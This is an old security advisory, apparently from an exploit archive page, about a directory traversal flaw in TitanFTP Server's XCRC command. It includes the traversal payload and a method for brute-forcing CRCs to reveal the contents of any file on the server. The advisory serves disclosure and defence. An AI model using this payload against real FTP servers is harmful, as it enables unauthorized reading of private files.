TitanFTP Server Arbitrary File Disclosure

2010-06-25 / 2010-06-26
Credit: bill
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure Details ============= Product: TitanFTP Server Security-Risk: high Remote-Exploit: maybe, assuming anonymous ftp access Local-Exploit: yes Vendor URL: http://www.southrivertech.com/ Found By: Bill Finlayson http://www.accensussecurity.com Affected: Versions 8.10.1125 and likely previous Issue: the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the file's size xcrc ..//..//..//..//a.txt 1 2 xcrc ..//..//..//..//a.txt 1 3 ... xcrc ..//..//..//..//a.txt 1 <filesize> when automated allows for an easy brute force attack on the crc's Status: Submitted to Vendor 6/14/10 fixed 6/15/10

References:

http://xforce.iss.net/xforce/xfdb/59492
http://www.securityfocus.com/bid/40949
http://www.securityfocus.com/archive/1/archive/1/511839/100/0/threaded
http://secunia.com/advisories/40237
http://osvdb.org/65533


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top